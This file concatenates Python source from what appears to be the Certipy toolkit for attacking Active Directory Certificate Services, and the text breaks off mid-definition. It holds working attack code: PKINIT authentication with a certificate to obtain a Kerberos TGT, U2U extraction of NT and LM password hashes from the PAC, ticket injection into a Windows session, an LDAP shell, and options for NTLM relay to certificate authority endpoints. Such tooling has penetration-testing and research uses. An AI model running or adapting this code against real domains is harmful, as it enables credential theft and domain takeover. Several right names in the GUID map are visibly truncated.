# Retrieved from Windows 2022 server via LDAP (CN=Extended-Rights,CN=Configuration,DC=...)
EXTENDED_RIGHTS_MAP = {
    "ab721a52-1e2f-11d0-9819-00aa0040529b": "Domain-Administer-Serve",
    "ab721a53-1e2f-11d0-9819-00aa0040529b": "User-Change-Password",
    "00299570-246d-11d0-a768-00aa006e0529": "User-Force-Change-Password",
    "ab721a54-1e2f-11d0-9819-00aa0040529b": "Send-As",
    "ab721a56-1e2f-11d0-9819-00aa0040529b": "Receive-As",
    "ab721a55-1e2f-11d0-9819-00aa0040529b": "Send-To",
    "c7407360-20bf-11d0-a768-00aa006e0529": "Domain-Password",
    "59ba2f42-79a2-11d0-9020-00c04fc2d3cf": "General-Information",
    "4c164200-20c0-11d0-a768-00aa006e0529": "User-Account-Restrictions",
    "5f202010-79a5-11d0-9020-00c04fc2d4cf": "User-Logon",
    "bc0ac240-79a9-11d0-9020-00c04fc2d4cf": "Membership",
    "a1990816-4298-11d1-ade2-00c04fd8d5cd": "Open-Address-Book",
    "77b5b886-944a-11d1-aebd-0000f80367c1": "Personal-Information",
    "e45795b2-9455-11d1-aebd-0000f80367c1": "Email-Information",
    "e45795b3-9455-11d1-aebd-0000f80367c1": "Web-Information",
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ab-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Synchronize",
    "1131f6ac-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Manage-Topology",
    "e12b56b6-0a95-11d1-adbb-00c04fd8d5cd": "Change-Schema-Maste",
    "d58d5f36-0a98-11d1-adbb-00c04fd8d5cd": "Change-Rid-Maste",
    "fec364e0-0a98-11d1-adbb-00c04fd8d5cd": "Do-Garbage-Collection",
    "0bc1554e-0a99-11d1-adbb-00c04fd8d5cd": "Recalculate-Hierarchy",
    "1abd7cf8-0a99-11d1-adbb-00c04fd8d5cd": "Allocate-Rids",
    "bae50096-4752-11d1-9052-00c04fc2d4cf": "Change-PDC",
    "440820ad-65b4-11d1-a3da-0000f875ae0d": "Add-GUID",
    "014bf69c-7b3b-11d1-85f6-08002be74fab": "Change-Domain-Maste",
    "e48d0154-bcf8-11d1-8702-00c04fb96050": "Public-Information",
    "4b6e08c0-df3c-11d1-9c86-006008764d0e": "msmq-Receive-Dead-Lette",
    "4b6e08c1-df3c-11d1-9c86-006008764d0e": "msmq-Peek-Dead-Lette",
    "4b6e08c2-df3c-11d1-9c86-006008764d0e": "msmq-Receive-computer-Journal",
    "4b6e08c3-df3c-11d1-9c86-006008764d0e": "msmq-Peek-computer-Journal",
    "06bd3200-df3e-11d1-9c86-006008764d0e": "msmq-Receive",
    "06bd3201-df3e-11d1-9c86-006008764d0e": "msmq-Peek",
    "06bd3202-df3e-11d1-9c86-006008764d0e": "msmq-Send",
    "06bd3203-df3e-11d1-9c86-006008764d0e": "msmq-Receive-journal",
    "b4e60130-df3f-11d1-9c86-006008764d0e": "msmq-Open-Connecto",
    "edacfd8f-ffb3-11d1-b41d-00a0c968f939": "Apply-Group-Policy",
    "037088f8-0ae1-11d2-b422-00a0c968f939": "RAS-Information",
    "9923a32a-3607-11d2-b9be-0000f87a36b2": "DS-Install-Replica",
    "cc17b1fb-33d9-11d2-97d4-00c04fd8d5cd": "Change-Infrastructure-Maste",
    "be2bb760-7f46-11d2-b9ad-00c04f79f805": "Update-Schema-Cache",
    "62dd28a8-7f46-11d2-b9ad-00c04f79f805": "Recalculate-Security-Inheritance",
    "69ae6200-7f46-11d2-b9ad-00c04f79f805": "DS-Check-Stale-Phantoms",
    "0e10c968-78fb-11d2-90d4-00c04f79dc55": "Enroll",
    "bf9679c0-0de6-11d0-a285-00aa003049e2": "Self-Membership",
    "72e39547-7b18-11d1-adef-00c04fd8d5cd": "DNS-Host-Name-Attributes",
    "f3a64788-5306-11d1-a9c5-0000f80367c1": "Validated-SPN",
    "b7b1b3dd-ab09-4242-9e30-9980e5d322f7": "Generate-RSoP-Planning",
    "9432c620-033c-4db7-8b58-14ef6d0bf477": "Refresh-Group-Cache",
    "91d67418-0135-4acc-8d79-c08e857cfbec": "SAM-Enumerate-Entire-Domain",
    "b7b1b3de-ab09-4242-9e30-9980e5d322f7": "Generate-RSoP-Logging",
    "b8119fd0-04f6-4762-ab7a-4986c76b3f9a": "Domain-Other-Parameters",
    "e2a36dc9-ae17-47c3-b58b-be34c55ba633": "Create-Inbound-Forest-Trust",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "ba33815a-4f93-4c76-87f3-57574bff8109": "Migrate-SID-History",
    "45ec5156-db7e-47bb-b53f-dbeb2d03c40f": "Reanimate-Tombstones",
    "68b1d179-0d15-4d4f-ab71-46152e79a7bc": "Allowed-To-Authenticate",
    "2f16c4a5-b98e-432c-952a-cb388ba33f2e": "DS-Execute-Intentions-Script",
    "f98340fb-7c5b-4cdb-a00b-2ebdfa115a96": "DS-Replication-Monitor-Topology",
    "280f369c-67c7-438e-ae98-1d46f3c6f541": "Update-Password-Not-Required-Bit",
    "ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501": "Unexpire-Password",
    "05c74c5e-4deb-43b4-bd9f-86664c2a7fd5": (
        "Enable-Per-User-Reversibly-Encrypted-Password"
    ),
    "4ecc03fe-ffc0-4947-b630-eb672a8a9dbc": "DS-Query-Self-Quota",
    "91e647de-d96f-4b70-9557-d63ff4f3ccd8": "Private-Information",
    "1131f6ae-9c07-11d1-f79f-00c04fc2dcd2": (
        "Read-Only-Replication-Secret-Synchronization"
    ),
    "ffa6f046-ca4b-4feb-b40d-04dfee722543": "MS-TS-GatewayAccess",
    "5805bc62-bdc9-4428-a5e2-856a0f4c185e": "Terminal-Server-License-Serve",
    "1a60ea8d-58a6-4b20-bcdc-fb71eb8a9ff8": "Reload-SSL-Certificate",
    "89e95b76-444d-4c62-991a-0facbeda640c": (
        "DS-Replication-Get-Changes-In-Filtered-Set"
    ),
    "7726b9d5-a4b4-4288-a6b2-dce952e80a7f": "Run-Protect-Admin-Groups-Task",
    "7c0e2a7c-a419-48e4-a995-10180aad54dd": "Manage-Optional-Features",
    "3e0f7e18-2c7a-4c10-ba82-4d926db99a3e": "DS-Clone-Domain-Controlle",
    "d31a8757-2447-4545-8081-3bb610cacbf2": "Validated-MS-DS-Behavior-Version",
    "80863791-dbe9-4eb8-837e-7f0ab55d9ac7": "Validated-MS-DS-Additional-DNS-Host-Name",
    "a05b8cc2-17bc-4802-a710-e7c15ab866a2": "AutoEnroll",
    "4125c71f-7fac-4ff0-bcb7-f09a41325286": "DS-Set-Owne",
    "88a9933e-e5c8-4f2a-9dd7-2527416b8092": "DS-Bypass-Quota",
    "084c93a2-620d-4879-a836-f0ae47de0e89": "DS-Read-Partition-Secrets",
    "94825a8d-b171-4116-8146-1e34d8f54401": "DS-Write-Partition-Secrets",
    "9b026da6-0d3c-465c-8bee-5199d7165cba": "DS-Validated-Write-Compute",
    "00000000-0000-0000-0000-000000000000": "All-Extended-Rights",
}

EXTENDED_RIGHTS_NAME_MAP = {k: v for v, k in EXTENDED_RIGHTS_MAP.items()}



import argparse
import base64
import datetime
import os
import platform
import ssl
import sys
import tempfile
from random import getrandbits
from typing import Tuple, Union

import ldap3
from asn1crypto import cms, core
from impacket.dcerpc.v5.rpcrt import TypeSerialization1
from impacket.examples.ldap_shell import LdapShell as _LdapShell
from impacket.krb5 import constants
from impacket.krb5.asn1 import (
    AD_IF_RELEVANT,
    AP_REQ,
    AS_REP,
    TGS_REP,
    TGS_REQ,
    Authenticator,
    EncASRepPart,
    EncTicketPart,
)
from impacket.krb5.asn1 import Ticket as TicketAsn1
from impacket.krb5.asn1 import seq_set, seq_set_iter
from impacket.krb5.ccache import CCache
from impacket.krb5.crypto import Key, _enctype_table
from impacket.krb5.kerberosv5 import KerberosError, sendReceive
from impacket.krb5.pac import (
    NTLM_SUPPLEMENTAL_CREDENTIAL,
    PAC_CREDENTIAL_DATA,
    PAC_CREDENTIAL_INFO,
    PAC_INFO_BUFFER,
    PACTYPE,
)
from impacket.krb5.types import KerberosTime, Principal, Ticket
from pyasn1.codec.der import decoder, encoder
from pyasn1.type.univ import noValue

from certipy.lib.certificate import (
    cert_id_to_parts,
    cert_to_pem,
    get_identifications_from_certificate,
    get_object_sid_from_certificate,
    hash_digest,
    hashes,
    key_to_pem,
    load_pfx,
    rsa,
    x509,
)
from certipy.lib.errors import KRB5_ERROR_MESSAGES
from certipy.lib.logger import logging
from certipy.lib.pkinit import PA_PK_AS_REP, Enctype, KDCDHKeyInfo, build_pkinit_as_req
from certipy.lib.target import Target


class LdapShell(_LdapShell):
    def __init__(self, tcp_shell, domain_dumper, client):
        super().__init__(tcp_shell, domain_dumper, client)

        self.use_rawinput = True
        self.shell = tcp_shell

        self.prompt = "\n# "
        self.tid = None
        self.intro = "Type help for list of commands"
        self.loggedIn = True
        self.last_output = None
        self.completion = []
        self.client = client
        self.domain_dumper = domain_dumper

    def do_dump(self, line):
        logging.warning("Not implemented")

    def do_exit(self, line):
        print("Bye!")
        return True


class DummyDomainDumper:
    def __init__(self, root: str):
        self.root = root


def truncate_key(value: bytes, keysize: int) -> bytes:
    output = b""
    current_num = 0
    while len(output) < keysize:
        current_digest = hash_digest(bytes([current_num]) + value, hashes.SHA1)
        if len(output) + len(current_digest) > keysize:
            output += current_digest[: keysize - len(output)]
            break
        output += current_digest
        current_num += 1

    return output


class Authenticate:
    def __init__(
        self,
        target: Target = None,
        pfx: str = None,
        cert: x509.Certificate = None,
        key: rsa.RSAPublicKey = None,
        no_save: bool = False,
        no_hash: bool = False,
        ptt: bool = False,
        print: bool = False,
        kirbi: bool = False,
        ldap_shell: bool = False,
        ldap_port: int = 0,
        ldap_scheme: str = "ldaps",
        ldap_user_dn: str = None,
        user_dn: str = None,
        debug=False,
        **kwargs
    ):
        self.target = target
        self.pfx = pfx
        self.cert = cert
        self.key = key
        self.no_save = no_save
        self.no_hash = no_hash
        self.ptt = ptt
        self.print = print
        self.kirbi = kirbi
        self.ldap_shell = ldap_shell
        self.ldap_port = (
            ldap_port if ldap_port != 0 else (389 if ldap_scheme == "ldap" else 636)
        )
        self.ldap_scheme = ldap_scheme
        self.ldap_user_dn = ldap_user_dn
        self.user_dn = user_dn
        self.verbose = debug
        self.kwargs = kwargs

        self.nt_hash: str = None
        self.lm_hash: str = None

        if self.pfx is not None:
            with open(self.pfx, "rb") as f:
                self.key, self.cert = load_pfx(f.read())

    def authenticate(
        self, username: str = None, domain: str = None, is_key_credential=False
    ):
        if username is None:
            username = self.target.username
        if domain is None:
            domain = self.target.domain

        if self.ldap_shell:
            return self.ldap_authentication()

        id_type = None
        identification = None
        object_sid = None
        if not is_key_credential:
            identifications = get_identifications_from_certificate(self.cert)

            if len(identifications) > 1:
                logging.info("Found multiple identifications in certificate")

                while True:
                    logging.info("Please select one:")
                    for i, identification in enumerate(identifications):
                        id_type, id_value = identification
                        print("    [%d] %s: %s" % (i, id_type, repr(id_value)))
                    idx = int(input("> "))

                    if idx >= len(identifications):
                        logging.warning("Invalid index")
                    else:
                        id_type, identification = identifications[idx]
                        break
            elif len(identifications) == 1:
                id_type, identification = identifications[0]
            else:
                id_type, identification = None, None

            cert_username, cert_domain = cert_id_to_parts([(id_type, identification)])

            object_sid = get_object_sid_from_certificate(self.cert)

            if not any([cert_username, cert_domain]):
                logging.warning(
                    "Could not find identification in the provided certificate"
                )

            if not username:
                username = cert_username
            elif cert_username:
                if username.lower() not in [
                    cert_username.lower(),
                    cert_username.lower() + "$",
                ]:
                    logging.warning(
                        (
                            "The provided username does not match the identification "
                            "found in the provided certificate: %s - %s"
                        )
                        % (repr(username), repr(cert_username))
                    )
                    res = input("Do you want to continue? (Y/n) ").rstrip("\n")
                    if res.lower() == "n":
                        return False

            if not domain:
                domain = cert_domain
            elif cert_domain:
                if (
                    domain.lower() != cert_domain.lower()
                    and not cert_domain.lower().startswith(
                        domain.lower().rstrip(".") + "."
                    )
                ):
                    logging.warning(
                        (
                            "The provided domain does not match the identification "
                            "found in the provided certificate: %s - %s"
                        )
                        % (repr(domain), repr(cert_domain))
                    )
                    res = input("Do you want to continue? (Y/n) ").rstrip("\n")
                    if res.lower() == "n":
                        return False

        if not all([username, domain]) and not is_key_credential:
            logging.error(
                (
                    "Username or domain is not specified, and identification "
                    "information was not found in the certificate"
                )
            )
            return False

        if not any([len(username), len(domain)]):
            logging.error("Username or domain is invalid: %s@%s" % (username, domain))
            return False

        domain = domain.lower()
        username = username.lower()
        upn = "%s@%s" % (username, domain)

        if self.target.target_ip is None:
            self.target.target_ip = self.target.resolver.resolve(domain)

        logging.info("Using principal: %s" % upn)

        return self.kerberos_authentication(
            username,
            domain,
            is_key_credential,
            id_type,
            identification,
            object_sid,
            upn,
        )

    def ldap_authentication(
        self,
        domain: str = None,
    ) -> Union[str, bool]:
        key_file = tempfile.NamedTemporaryFile(delete=False)
        key_file.write(key_to_pem(self.key))
        key_file.close()

        cert_file = tempfile.NamedTemporaryFile(delete=False)
        cert_file.write(cert_to_pem(self.cert))
        cert_file.close()

        sasl_credentials = None
        if self.ldap_user_dn:
            sasl_credentials = "dn:%s" % self.ldap_user_dn

        tls = ldap3.Tls(
            local_private_key_file=key_file.name,
            local_certificate_file=cert_file.name,
            validate=ssl.CERT_NONE,
            ciphers="ALL:@SECLEVEL=0",
        )

        host = self.target.target_ip
        if host is None:
            host = domain

        logging.info("Connecting to %s" % repr("%s://%s:%d" % (self.ldap_scheme, host, self.ldap_port)))
        ldap_server = ldap3.Server(
            host=host,
            get_info=ldap3.ALL,
            use_ssl=True if self.ldap_scheme == "ldaps" else False,
            port=self.ldap_port,
            tls=tls,
            connect_timeout=self.target.timeout,
        )

        conn_kwargs = dict()
        if self.ldap_scheme == "ldap":
            conn_kwargs = {
                "authentication": ldap3.SASL,
                "sasl_mechanism": ldap3.EXTERNAL,
                "auto_bind": ldap3.AUTO_BIND_TLS_BEFORE_BIND,
                "sasl_credentials": sasl_credentials,
            }

        try:
            ldap_conn = ldap3.Connection(
                ldap_server,
                raise_exceptions=True,
                receive_timeout=self.target.timeout * 10,
                **conn_kwargs
            )
        except ldap3.core.exceptions.LDAPUnavailableResult as e:
            logging.error("LDAP not configured for SSL/TLS connections")
            if self.verbose:
                raise e
            return False

        if self.ldap_scheme == "ldaps":
            ldap_conn.open()

        who_am_i = ldap_conn.extend.standard.who_am_i()
        logging.info(
            "Authenticated to %s as: %s" % (repr(self.target.target_ip), who_am_i)
        )

        root = ldap_server.info.other["defaultNamingContext"][0]
        domain_dumper = DummyDomainDumper(root)
        ldap_shell = LdapShell(sys, domain_dumper, ldap_conn)
        try:
            ldap_shell.cmdloop()
        except KeyboardInterrupt:
            print("Bye!\n")
            pass

        os.unlink(key_file.name)
        os.unlink(cert_file.name)

    def kerberos_authentication(
        self,
        username: str = None,
        domain: str = None,
        is_key_credential: bool = False,
        id_type: str = None,
        identification: str = None,
        object_sid: str = None,
        upn: str = None,
    ) -> Union[str, bool]:
        as_req, diffie = build_pkinit_as_req(username, domain, self.key, self.cert)

        logging.info("Trying to get TGT...")

        try:
            tgt = sendReceive(as_req, domain, self.target.target_ip)
        except KerberosError as e:
            if e.getErrorCode() not in KRB5_ERROR_MESSAGES:
                logging.error("Got unknown Kerberos error: %#x" % e.getErrorCode())
                return False

            if "KDC_ERR_CLIENT_NAME_MISMATCH" in str(e) and not is_key_credential:
                logging.error(
                    ("Name mismatch between certificate and user %s" % repr(username))
                )
                if id_type is not None:
                    logging.error(
                        ("Verify that the username %s matches the certificate %s: %s")
                        % (repr(username), id_type, identification)
                    )
            elif "KDC_ERR_WRONG_REALM" in str(e) and not is_key_credential:
                logging.error(("Wrong domain name specified %s" % repr(domain)))
                if id_type is not None:
                    logging.error(
                        ("Verify that the domain %s matches the certificate %s: %s")
                        % (repr(domain), id_type, identification)
                    )
            elif "KDC_ERR_CERTIFICATE_MISMATCH" in str(e) and not is_key_credential:
                logging.error(
                    (
                        "Object SID mismatch between certificate and user %s"
                        % repr(username)
                    )
                )
                if object_sid is not None:
                    logging.error(
                        ("Verify that user %s has object SID %s")
                        % (repr(username), repr(object_sid))
                    )
            else:
                logging.error("Got error while trying to request TGT: %s" % str(e))

            return False

        logging.info("Got TGT")

        as_rep = decoder.decode(tgt, asn1Spec=AS_REP())[0]

        for pa in as_rep["padata"]:
            if pa["padata-type"] == 17:
                pk_as_rep = PA_PK_AS_REP.load(bytes(pa["padata-value"])).native
                break
        else:
            logging.error("PA_PK_AS_REP was not found in AS_REP")
            return False

        ci = cms.ContentInfo.load(pk_as_rep["dhSignedData"]).native
        sd = ci["content"]
        key_info = sd["encap_content_info"]

        if key_info["content_type"] != "1.3.6.1.5.2.3.2":
            logging.error("Unexpected value for key info content type")
            return False

        auth_data = KDCDHKeyInfo.load(key_info["content"]).native
        pub_key = int(
            "".join(["1"] + [str(x) for x in auth_data["subjectPublicKey"]]), 2
        )
        pub_key = int.from_bytes(
            core.BitString(auth_data["subjectPublicKey"]).dump()[7:],
            "big",
            signed=False,
        )
        shared_key = diffie.exchange(pub_key)

        server_nonce = pk_as_rep["serverDHNonce"]
        full_key = shared_key + diffie.dh_nonce + server_nonce

        etype = as_rep["enc-part"]["etype"]
        cipher = _enctype_table[etype]
        if etype == Enctype.AES256:
            t_key = truncate_key(full_key, 32)
        elif etype == Enctype.AES128:
            t_key = truncate_key(full_key, 16)
        else:
            logging.error("Unexpected encryption type in AS_REP")
            return False

        key = Key(cipher.enctype, t_key)
        enc_data = as_rep["enc-part"]["cipher"]
        dec_data = cipher.decrypt(key, 3, enc_data)
        enc_as_rep_part = decoder.decode(dec_data, asn1Spec=EncASRepPart())[0]

        cipher = _enctype_table[int(enc_as_rep_part["key"]["keytype"])]
        session_key = Key(cipher.enctype, bytes(enc_as_rep_part["key"]["keyvalue"]))

        ccache = CCache()
        ccache.fromTGT(tgt, key, None)
        krb_cred = ccache.toKRBCRED()

        if self.print:
            logging.info("Ticket:")
            print(base64.b64encode(krb_cred).decode())

        if not self.no_save or self.ptt:
            if not self.no_save:
                if self.kirbi:
                    kirbi_name = "%s.kirbi" % username.rstrip("$")
                    ccache.saveKirbiFile(kirbi_name)
                    logging.info("Saved Kirbi file to %s" % repr(kirbi_name))
                else:
                    self.ccache_name = "%s.ccache" % username.rstrip("$")
                    ccache.saveFile(self.ccache_name)
                    logging.info(
                        "Saved credential cache to %s" % repr(self.ccache_name)
                    )

            if self.ptt:
                krb_cred = ccache.toKRBCRED()
                logging.info("Trying to inject ticket into session")

                if platform.system().lower() != "windows":
                    logging.error("Not running on Windows platform. Aborting")
                else:
                    try:
                        from certipy.lib import sspi

                        res = sspi.submit_ticket(krb_cred)
                        if res:
                            logging.info("Successfully injected ticket into session")
                    except Exception as e:
                        logging.error(
                            "Failed to inject ticket into session: %s" % str(e)
                        )

        if not self.no_hash:
            logging.info("Trying to retrieve NT hash for %s" % repr(username))

            # Try to extract NT hash via U2U
            # https://github.com/dirkjanm/PKINITtools/blob/master/getnthash.py
            # AP_REQ
            ap_req = AP_REQ()
            ap_req["pvno"] = 5
            ap_req["msg-type"] = int(constants.ApplicationTagNumbers.AP_REQ.value)

            opts = []
            ap_req["ap-options"] = constants.encodeFlags(opts)

            ticket = Ticket()
            ticket.from_asn1(as_rep["ticket"])

            seq_set(ap_req, "ticket", ticket.to_asn1)

            authenticator = Authenticator()
            authenticator["authenticator-vno"] = 5

            authenticator["crealm"] = bytes(as_rep["crealm"])

            client_name = Principal()
            client_name.from_asn1(as_rep, "crealm", "cname")

            seq_set(authenticator, "cname", client_name.components_to_asn1)

            now = datetime.datetime.utcnow()
            authenticator["cusec"] = now.microsecond
            authenticator["ctime"] = KerberosTime.to_asn1(now)

            encoded_authenticator = encoder.encode(authenticator)

            encrypted_encoded_authenticator = cipher.encrypt(
                session_key, 7, encoded_authenticator, None
            )

            ap_req["authenticator"] = noValue
            ap_req["authenticator"]["etype"] = cipher.enctype
            ap_req["authenticator"]["cipher"] = encrypted_encoded_authenticator

            encoded_ap_req = encoder.encode(ap_req)

            # TGS_REQ
            tgs_req = TGS_REQ()

            tgs_req["pvno"] = 5
            tgs_req["msg-type"] = int(constants.ApplicationTagNumbers.TGS_REQ.value)

            tgs_req["padata"] = noValue
            tgs_req["padata"][0] = noValue
            tgs_req["padata"][0]["padata-type"] = int(
                constants.PreAuthenticationDataTypes.PA_TGS_REQ.value
            )
            tgs_req["padata"][0]["padata-value"] = encoded_ap_req

            req_body = seq_set(tgs_req, "req-body")

            opts = []
            opts.append(constants.KDCOptions.forwardable.value)
            opts.append(constants.KDCOptions.renewable.value)
            opts.append(constants.KDCOptions.canonicalize.value)
            opts.append(constants.KDCOptions.enc_tkt_in_skey.value)
            opts.append(constants.KDCOptions.forwardable.value)
            opts.append(constants.KDCOptions.renewable_ok.value)

            req_body["kdc-options"] = constants.encodeFlags(opts)

            server_name = Principal(
                username, type=constants.PrincipalNameType.NT_UNKNOWN.value
            )

            seq_set(req_body, "sname", server_name.components_to_asn1)

            req_body["realm"] = str(as_rep["crealm"])

            now = datetime.datetime.utcnow() + datetime.timedelta(days=1)

            req_body["till"] = KerberosTime.to_asn1(now)
            req_body["nonce"] = getrandbits(31)
            seq_set_iter(
                req_body,
                "etype",
                (int(cipher.enctype), int(constants.EncryptionTypes.rc4_hmac.value)),
            )

            ticket = ticket.to_asn1(TicketAsn1())
            seq_set_iter(req_body, "additional-tickets", (ticket,))
            message = encoder.encode(tgs_req)

            tgs = sendReceive(message, domain, self.target.target_ip)

            tgs = decoder.decode(tgs, asn1Spec=TGS_REP())[0]

            ciphertext = tgs["ticket"]["enc-part"]["cipher"]

            new_cipher = _enctype_table[int(tgs["ticket"]["enc-part"]["etype"])]

            plaintext = new_cipher.decrypt(session_key, 2, ciphertext)
            special_key = Key(18, t_key)

            data = plaintext
            enc_ticket_part = decoder.decode(data, asn1Spec=EncTicketPart())[0]
            ad_if_relevant = decoder.decode(
                enc_ticket_part["authorization-data"][0]["ad-data"],
                asn1Spec=AD_IF_RELEVANT(),
            )[0]
            pac_type = PACTYPE(ad_if_relevant[0]["ad-data"].asOctets())
            buff = pac_type["Buffers"]

            nt_hash = None
            lm_hash = "aad3b435b51404eeaad3b435b51404ee"

            for _ in range(pac_type["cBuffers"]):
                info_buffer = PAC_INFO_BUFFER(buff)
                data = pac_type["Buffers"][info_buffer["Offset"] - 8 :][
                    : info_buffer["cbBufferSize"]
                ]
                if info_buffer["ulType"] == 2:
                    cred_info = PAC_CREDENTIAL_INFO(data)
                    new_cipher = _enctype_table[cred_info["EncryptionType"]]
                    out = new_cipher.decrypt(
                        special_key, 16, cred_info["SerializedData"]
                    )
                    type1 = TypeSerialization1(out)
                    new_data = out[len(type1) + 4 :]
                    pcc = PAC_CREDENTIAL_DATA(new_data)
                    for cred in pcc["Credentials"]:
                        cred_structs = NTLM_SUPPLEMENTAL_CREDENTIAL(
                            b"".join(cred["Credentials"])
                        )
                        if any(cred_structs["LmPassword"]):
                            lm_hash = cred_structs["LmPassword"].hex()
                        nt_hash = cred_structs["NtPassword"].hex()
                        break
                    break

                buff = buff[len(info_buffer) :]
            else:
                logging.error("Could not find credentials in PAC")
                return False

            self.lm_hash = lm_hash
            self.nt_hash = nt_hash

            if not is_key_credential:
                logging.info("Got hash for %s: %s:%s", repr(upn), lm_hash, nt_hash)

            return nt_hash

        return False


def entry(options: argparse.Namespace) -> None:
    options.no_pass = True
    target = Target.create(
        domain=options.domain,
        username=options.username,
        dc_ip=options.dc_ip,
        target_ip=options.dc_ip,
        ns=options.ns,
        timeout=options.timeout,
        dns_tcp=options.dns_tcp,
        no_pass=True,
    )

    authenticate = Authenticate(target=target, **vars(options))
    authenticate.authenticate()



from . import account, auth, ca, cert, find, forge, ptt, relay, req, shadow, template

ENTRY_PARSERS = [
    account,
    auth,
    ca,
    cert,
    find,
    forge,
    ptt,
    relay,
    req,
    shadow,
    template,
]



import argparse
import sys

from certipy.lib.certificate import (
    cert_to_pem,
    create_pfx,
    der_to_cert,
    der_to_key,
    key_to_pem,
    load_pfx,
    pem_to_cert,
    pem_to_key,
)
from certipy.lib.logger import logging


def entry(options: argparse.Namespace) -> None:
    cert, key = None, None

    if not any([options.pfx, options.cert, options.key]):
        logging.error("-pfx, -cert, or -key is required")
        return

    if options.pfx:
        password = None
        if options.password:
            logging.debug(
                "Loading PFX %s with password %s" % (repr(options.pfx), password)
            )
            password = options.password.encode()
        else:
            logging.debug("Loading PFX %s without password" % repr(options.pfx))

        with open(options.pfx, "rb") as f:
            pfx = f.read()

        key, cert = load_pfx(pfx, password)

    if options.cert:
        logging.debug("Loading certificate from %s" % repr(options.cert))

        with open(options.cert, "rb") as f:
            cert = f.read()
        try:
            cert = pem_to_cert(cert)
        except Exception:
            cert = der_to_cert(cert)

    if options.key:
        logging.debug("Loading private key from %s" % repr(options.cert))

        with open(options.key, "rb") as f:
            key = f.read()
        try:
            key = pem_to_key(key)
        except Exception:
            key = der_to_key(key)

    if options.export:
        pfx = create_pfx(key, cert)
        if options.out:
            logging.info("Writing PFX to %s" % repr(options.out))

            with open(options.out, "wb") as f:
                f.write(pfx)
        else:
            sys.stdout.buffer.write(pfx)
    else:
        output = ""
        log_str = ""
        if cert and not options.nocert:
            output += cert_to_pem(cert).decode()
            log_str += "certificate"
            if key:
                log_str += " and "

        if key and not options.nokey:
            output += key_to_pem(key).decode()
            log_str += "private key"

        if len(output) == 0:
            logging.error("Output is empty")
            return

        if options.out:
            logging.info("Writing %s to %s" % (log_str, repr(options.out)))

            with open(options.out, "w") as f:
                f.write(output)
        else:
            print(output)



NAME = "auth"

import argparse
from typing import Callable, Tuple

from . import target


def entry(options: argparse.Namespace):
    from certipy.commands import auth

    auth.entry(options)


def add_subparser(subparsers: argparse._SubParsersAction) -> Tuple[str, Callable]:
    subparser = subparsers.add_parser(NAME, help="Authenticate using certificates")

    subparser.add_argument(
        "-pfx",
        action="store",
        metavar="pfx/p12 file name",
        help="Path to certificate",
        required=True,
    )

    subparser.add_argument(
        "-no-save", action="store_true", help="Don't save TGT to file"
    )
    subparser.add_argument(
        "-no-hash", action="store_true", help="Don't request NT hash"
    )
    subparser.add_argument(
        "-ptt",
        action="store_true",
        help="Submit TGT for current logon session (Windows only)",
    )
    subparser.add_argument(
        "-print",
        action="store_true",
        help="Print TGT in Kirbi format",
    )
    subparser.add_argument(
        "-kirbi",
        action="store_true",
        help="Save TGT in Kirbi format",
    )
    subparser.add_argument("-debug", action="store_true", help="Turn debug output on")

    group = subparser.add_argument_group("connection options")

    group.add_argument(
        "-dc-ip",
        action="store",
        metavar="ip address",
        help="IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in "
        "the target parameter",
    )
    group.add_argument(
        "-ns",
        action="store",
        metavar="nameserver",
        help="Nameserver for DNS resolution",
    )
    group.add_argument(
        "-dns-tcp", action="store_true", help="Use TCP instead of UDP for DNS queries"
    )
    group.add_argument(
        "-timeout",
        action="store",
        metavar="seconds",
        help="Timeout for connections",
        default=5,
        type=int,
    )

    group = subparser.add_argument_group("authentication options")
    group.add_argument(
        "-username",
        action="store",
        metavar="username",
    )
    group.add_argument(
        "-domain",
        action="store",
        metavar="domain",
    )
    group.add_argument(
        "-ldap-shell",
        action="store_true",
        help="Authenticate with the certificate via Schannel against LDAP",
    )
    group = subparser.add_argument_group("ldap options")
    group.add_argument(
        "-ldap-port",
        action="store",
        help="LDAP port. Default: 636",
        metavar="port",
        default=0,
        type=int,
    )
    group.add_argument(
        "-ldap-scheme",
        action="store",
        metavar="ldap scheme",
        choices=["ldap", "ldaps"],
        default="ldaps",
    )
    group.add_argument(
        "-ldap-user-dn",
        action="store",
        metavar="dn",
        help="Distinguished Name of target account for LDAPS authentication",
    )

    return NAME, entry



NAME = "relay"

import argparse
from typing import Callable, Tuple


def entry(options: argparse.Namespace):
    from certipy.commands import relay

    relay.entry(options)


def add_subparser(subparsers: argparse._SubParsersAction) -> Tuple[str, Callable]:
    subparser = subparsers.add_parser(NAME, help="NTLM Relay to AD CS HTTP Endpoints")

    subparser.add_argument(
        "-target",
        action="store",
        metavar="hostname",
        required=True,
        help="protocol://IP address or hostname of certificate authority. Example: http://ca.corp.local for ESC8 or rpc://ca.corp.local for ESC11",
    )
    subparser.add_argument("-debug", action="store_true", help="Turn debug output on")

    group = subparser.add_argument_group("certificate request options")
    group.add_argument(
        "-ca",
        action="store",
        metavar="certificate authority name",
        help="CA name to request certificate from. Example: 'CORP-CA'. Only required for RPC relay (ESC11)"
    )
    group.add_argument(
        "-template",
        action="store",
        metavar="template name",
        help="If omitted, the template 'Machine' or 'User' is chosen by default depending on whether the relayed account name ends with '$'. Relaying a DC should require specifying the 'DomainController' template",
    )

    group.add_argument("-upn", action="store", metavar="alternative UPN")
    group.add_argument("-dns", action="store", metavar="alternative DNS")
    group.add_argument("-sid", action="store", metavar="alternative Object SID")
    group.add_argument(
        "-retrieve",
        action="store",
        metavar="request ID",
        help="Retrieve an issued certificate specified by a request ID instead of requesting a new certificate",
        default=0,
        type=int,
    )
    group.add_argument(
        "-key-size",
        action="store",
        metavar="RSA key length",
        help="Length of RSA key. Default: 2048",
        default=2048,
        type=int,
    )

    group = subparser.add_argument_group("output options")
    group.add_argument("-out", action="store", metavar="output file name")

    group = subparser.add_argument_group("server options")
    group.add_argument(
        "-interface",
        action="store",
        metavar="ip address",
        help="IP Address of interface to listen on",
        default="0.0.0.0",
    )
    group.add_argument(
        "-port",
        action="store",
        help="Port to listen on",
        default=445,
        type=int,
    )

    group = subparser.add_argument_group("relay options")
    group.add_argument(
        "-forever",
        action="store_true",
